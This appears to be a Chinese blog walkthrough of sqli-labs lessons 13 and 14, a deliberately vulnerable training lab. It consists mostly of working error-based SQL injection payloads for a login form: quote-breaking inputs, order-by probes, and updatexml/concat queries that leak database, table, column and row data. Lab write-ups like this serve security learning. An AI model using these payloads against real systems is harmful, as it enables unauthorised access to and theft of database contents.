zoukankan      html  css  js  c++  java
  • sqli-labs less-13 --> less-14

    Less-13(报错盲注)

    1.判断是否存在注入点

    输入admin’时,出现如下报错信息,经过分析,存在注入点,且注入方式为:(‘’)

    执行uname=admin')#&passwd=&submit=Submit,回显正确,但是没有信息,判断为报错型的盲注

    2.判断回显位数

    uname=admin') order by 2#&passwd=&submit=Submit  判断回显位数位数为2

    3.爆数据库名

    uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit

    4.爆表

    uname=admin') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit

    5.爆字段

    uname=admin') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit

    6.爆数据

    uname=admin') and updatexml(1,concat(0x7e,(select group_concat(USER) from users),0x7e),1)#&passwd=&submit=Submit,报错显示如下,原因未知

     

    还是换成emails来爆吧...

    uname=admin') and updatexml(1,concat(0x7e,(select group_concat(id) from emails),0x7e),1)#&passwd=&submit=Submit

     

    -------------------------------------------------------END----------------------------------------------------------------

    Less-14(报错盲注)(与less-13基本一样)

    1.判断是否存在注入点

    当执行uname=admin"&passwd=&submit=Submit,出现报错信息,如下,当执行uname=admin"#&passwd=&submit=Submit,回显正确,

    经过分析判断存在注入点,注入方式为:””

    2.判断回显位数

    uname=admin" order by 2#&passwd=&submit=Submit 判断的回显位数为2

    3.爆库名

    uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit

    4.爆表

    uname=admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit

    5.爆字段

    uname=admin" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='referers'),0x7e),1)#&passwd=&submit=Submit

    6.爆数据

    uname=admin" and updatexml(1,concat(0x7e,(select group_concat(id) from referers),0x7e),1)#&passwd=&submit=Submit

    -------------------------------------------------------END----------------------------------------------------------------

  • 相关阅读:
    17.1 Replication Configuration 复制配置
    用 Flask 来写个轻博客 (3) — (M)VC_连接 MySQL 和 SQLAlchemy
    用 Flask 来写个轻博客 (2) — Hello World!
    Mysql表分区的利弊
    用 Flask 来写个轻博客 (1) — 创建项目
    RPM方式安装MySQL5.6
    Chapter 17 Replication
    14.8.11 Physical Structure of an InnoDB Index InnoDB Index 的物理结构
    14.8.9 Clustered and Secondary Indexes
    中小企业如何建立商业智能
  • 原文地址:https://www.cnblogs.com/B-roin/p/12330667.html
Copyright © 2011-2022 走看看